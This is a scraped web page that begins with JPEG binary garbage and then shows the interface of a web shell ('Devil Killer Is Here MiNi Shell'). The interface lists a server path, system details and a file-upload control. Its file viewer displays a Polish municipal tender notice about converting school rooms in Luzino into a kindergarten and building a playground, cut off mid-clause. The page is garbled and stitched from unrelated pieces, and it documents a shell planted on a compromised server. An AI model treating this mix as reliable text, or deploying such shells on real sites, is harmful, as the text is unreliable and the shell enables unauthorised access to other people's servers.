JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220415/0012446301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> ZMIANA SPOSOBU UŻYTKOWANIA WRAZ Z PRZEBUDOWĄ POMIESZCZEŃ SZKOŁY PODSTAWOWEJ NR 1 W LUZINIE NA PRZEDSZKOLE I RAMPĄ PODJAZDOWĄ ORAZ BUDOWA PLACU ZABAW PRZY BUDYNKU SZKOŁY PODSTAWOWEJ NR 1W LUZINIE </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA LUZINO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191675340</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Ofiar Stutthofu 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Luzino</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-242</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@luzino.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.luzino.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZMIANA SPOSOBU UŻYTKOWANIA WRAZ Z PRZEBUDOWĄ POMIESZCZEŃ SZKOŁY PODSTAWOWEJ NR 1 W LUZINIE NA PRZEDSZKOLE I RAMPĄ PODJAZDOWĄ ORAZ BUDOWA PLACU ZABAW PRZY BUDYNKU SZKOŁY PODSTAWOWEJ NR 1W LUZINIE </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-55219a80-bc94-11ec-aa46-6a814e8de928</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00124463</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00037003/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Zmiana sposobu użytkowania wraz z przebudową pomieszczeń Szkoły Podstawowej nr 1 w Luzinie na przedszkole i rampą podjazdową oraz budowa placu zabaw przy budynku Szkoły Podstawowej nr 1 w Luzinie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Przedmiot zamówienia jest dofinansowany w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020 współfinansowanego z Europejskiego Funduszu Społecznego. Zgodnie z umową o dofinansowanie RPPM.03.01.00-22-0072/20-00 zawartą w dniu 19.10.2021 r. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.platformazakupowa.pl/pn/ug_luzino/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.platformazakupowa.pl/pn/ug_luzino/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne sporządzenia, wysyłania i odbierania korespondencji elektronicznej, przekazywane przy użyciu Platformy znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje .<br/>Oferta musi być sporządzona w języku polskim, w postaci elektronicznej i opatrzona kwalifikowanym podpisem elektronicznym, lub podpisem zaufanym lub podpisem osobistym. <br/>Ofertę sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2021 r. poz. 2070 ze zm.), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, z uwzględnieniem rodzaju przekazywanych danych, np. .pdf, .doc, .docx, .rtf,.xps, .odt.<br/>Ponadto, do przygotowania oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy kwalifikowanego podpisu elektronicznego, lub podpisu zaufanego lub podpisu osobistego.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r., w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119, str. 1; z<br/>2018 r. Nr 127 poz. 2, z 2021r. nr 74 poz. 35), dalej „RODO”, informujemy, że: 1) administratorem<br/>Pani/Pana danych osobowych jest Gmina Luzino, 2) kontakt do inspektora ochrony danych osobowych<br/>w Gminie Luzino, adres e-mail: inspektor.abi@gmail.com , 3) Pani/Pana dane osobowe przetwarzane<br/>będą na podstawie art. 6 ust. 1 lit. c RODO, w celu prowadzenia przedmiotowego postępowania o<br/>udzielenie zamówienia publicznego oraz zawarcia<br/>umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych<br/>procedur udzielania zamówień publicznych spoczywający na Zamawiającym; 4) odbiorcami Pani/Pana<br/>danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp; 5) Pani/Pana dane osobowe będą<br/>przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy; 6) obowiązek podania przez Panią/Pana danych<br/>osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>- konsekwencje niepodania określonych danych wynikają z ustawy Pzp; 7) w odniesieniu do Pani/Pana<br/>danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO; 8) posiada Pan/Pani: a) na podstawie art. 15 RODO prawo dostępu do danych osobowych<br/>Pani/Pana dotyczących; b) na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia<br/>Pani/Pana danych osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą<br/>postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności<br/>protokołu oraz jego załączników; c) na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>postępowania o udzielenie zamówienia; d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony<br/>Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących<br/>narusza przepisy RODO; 9) nie przysługuje Pani/Panu: a) w związku z art. 17 ust. 3 lit. b, d lub e<br/>RODO prawo do usunięcia danych osobowych; b) prawo do przenoszenia danych osobowych, o<br/>którym mowa w art. 20 RODO; c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania<br/>danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6<br/>ust.1 lit. c RODO. 3.16.) RODO ograniczenia stosowania)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">2. Jednocześnie Zamawiający przypomina o ciążącym na<br/>Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których<br/>dane przekazane zostaną Zamawiającemu w związku z prowadzonym<br/>postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w<br/>postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust.<br/>5 RODO. 3. W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO,<br/>wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane<br/>dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w<br/>szczególności podania nazwy lub daty postępowania o udzielenie zamówienia. 4. Wystąpienie z<br/>żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia postępowania o udzielenie zamówienia publicznego. 5. Przysługuje Pani/Panu<br/>prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana<br/>danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd<br/>Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1 zamówienia – Zmiana sposobu użytkowania pomieszczeń Szkoły Podstawowej w Luzinie na przedszkole tj. zmiana sposobu użytkowania 7 pomieszczeń szkolnych – sal lekcyjnych wraz z zapleczem i rampą podjazdową. <br/>Zakres robót, w przedmiotowej części zamówienia, w szczególności obejmuje:<br/>1)	wydzielenie przedmiotowej części przedszkolnej,<br/>2)	wyposażenie klatki schodowej w stałe kurtyny dymowe,<br/>3)	przebudowę pomieszczeń toalet, <br/>4)	wymianę stolarki drzwiowej w klatce schodowej, <br/>5)	wykonanie zewnętrznej rampy podjazdowej wraz ze schodami zewnętrznymi,<br/>6)	demontaż ścianki działowej przy klatce schodowej,<br/>7)	wykonanie obudów grzejników w pomieszczeniach toalet oraz salach dydaktycznych,<br/>8)	wykonanie okładzin ściennych.<br/>Szczegółowy opis przedmiotu zamówienia oraz wymagania jakościowe odnoszące się do, co najmniej głównych elementów składających się na przedmiot zamówienia, odpowiednio do części zamówienia, określone zostały w dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych, stanowiących Załącznik nr 4 do niniejszej SWZ.<br/>Do każdej normy, przywołanej zarówno, w dokumentacji projektowej jak i specyfikacji technicznej wykonania i odbioru robót budowlanych, odpowiednio dla części nr 1 i 2 zamówienia, dopisuje się określenie „lub równoważne”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <p class="mb-0">45317300-5 - Elektryczne elektrycznych urządzeń rozdzielczych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-08-26</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena przeprowadzona będzie w skali punktowej 0-100 pkt. Oferta najtańsza otrzyma 100 pkt., pozostałe proporcjonalnie mniej (proporcjonalność liniowa).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2 zamówienia - Budowa placu zabaw przy budynku Szkoły Podstawowej nr 1 w Luzinie.<br/>Zakres robót, w przedmiotowej części zamówienia, w szczególności obejmuje:<br/>1)	nawierzchnię bezpieczną, <br/>2)	dostawę i montaż, urządzeń i elementów placu zabaw, takich jak:<br/>a)	huśtawka wagowa, <br/>b)	bujak,<br/>c)	tablica edukacyjna gra oxo,<br/>d)	tablica edukacyjna,<br/>e)	tablica informacyjna z regulaminem,<br/>f)	ławka,<br/>g)	kosz na śmieci,<br/>3)	obrzeża elastyczne,<br/>4)	prace rozbiórkowe i porządkowe. <br/>Szczegółowy opis przedmiotu zamówienia oraz wymagania jakościowe odnoszące się do, co najmniej głównych elementów składających się na przedmiot zamówienia, odpowiednio do części zamówienia, określone zostały w dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych, stanowiących Załącznik nr 4 do niniejszej SWZ.<br/>Do każdej normy, przywołanej zarówno, w dokumentacji projektowej jak i specyfikacji technicznej wykonania i odbioru robót budowlanych, odpowiednio dla części nr 1 i 2 zamówienia, dopisuje się określenie „lub równoważne”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45112723-9 - Roboty w zakresie kształtowania placów zabaw</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-08-26</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena przeprowadzona będzie w skali punktowej 0-100 pkt. Oferta najtańsza otrzyma 100 pkt., pozostałe proporcjonalnie mniej (proporcjonalność liniowa).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Wykonawca,najpóźniejprzedupływemterminuskładaniaofert,winienwnieśćwadiumwwysokości:5.500,00zł(słownie:pięćtysięcypięćsetzłi00/100),zuwzględnieniem,żekwotywadiumdlaposzczególnychczęścizamówieniawynoszą:1)wczęścinr1zamówienia–4.500,00zł(słownie:czterytysiącepięćsetzłi00/100)2)wczęścinr2zamówienia–1.000,00zł(słownie:jedentysiąci00/100)-iutrzymaćjenieprzerwaniedodniaupływuterminuzwiązaniaofertą,zwyjątkiemprzypadków,októrychmowawart.98ust.1pkt2i3orazust.2ustawyPzp.Uwaga!Zamawiającyinformuje,żeWykonawcazabezpieczającwadiumofertyczęściowej,możewnieśćwadiumdlakażdejczęścizamówieniaoddzielnielubkumulatywnie,jednakże,wtymdrugimprzypadku,należypamiętaćoprzyporządkowaniukwotywadiumdoposzczególnychczęścizamówienia.2.Wadiummożebyćwnoszonewjednejlubkilkunastępującychformach:1)pieniądzu;2)gwarancjachbankowych;3)gwarancjachubezpieczeniowych;4)poręczeniachudzielanychprzezpodmioty,októrychmowawart.6bust.5pkt2ustawyzdnia9listopada2000r.outworzeniuPolskiejAgencjiRozwojuPrzedsiębiorczości(Dz.U.z2019r.poz.310,836i1572).3.WadiumwniesionewpieniądzunależyzłożyćprzelewembankowymnakontoZamawiającego:81834900020012881820000090zdopiskiem:„WADIUM–nrpostępowania2.2022–Częśćnr……………zamówienia”.4.ZaterminwniesieniawadiumwformiepieniężnejuznajesiędatęuznaniaśrodkównakoncieZamawiającego(dzień,godzina).5.Wprzypadkuzłożeniawadiumwinnejformieniżpieniężna,WykonawcaprzekazujeZamawiającemu:a)oryginałgwarancjibankowejlubporęczenia,wpostacielektronicznej,podpisanekwalifikowanympodpisemelektronicznymprzezwystawcę,albob)oryginałgwarancjiubezpieczeniowejwpostacielektronicznej.Uwaga!Cyfroweodwzorowanie(kopiaelektronicznadokumentuzapisanegowpostacipapierowej,np.skan,fotokopia)niestanowioryginaługwarancjilubporęczeniawpostacielektronicznej.6.WadiumwniesioneprzezjednegozWykonawcówwspólnieubiegającychsięozamówienieuważasięzawniesioneprawidłowo.7.Zamawiającyzwracawadiumniezwłocznie,niepóźniejjednakniżwterminie7dnioddniawystąpieniajednejzokoliczności:1)upływuterminuzwiązaniaofertą;2)zawarciaumowywsprawiezamówieniapublicznego;3)unieważnieniapostępowaniaoudzieleniezamówienia,zwyjątkiemsytuacji,gdyniezostałorozstrzygnięteodwołanienaczynnośćunieważnieniaalbonieupłynąłtermindojegowniesienia.8.Zamawiający,niezwłocznie,niepóźniejjednakniżwterminie7dnioddniazłożeniawnioskuzwracawadiumWykonawcy:1)którywycofałofertęprzedupływemterminuskładaniaofert;2)któregoofertazostałaodrzucona;3)powyborzenajkorzystniejszejoferty,zwyjątkiemwy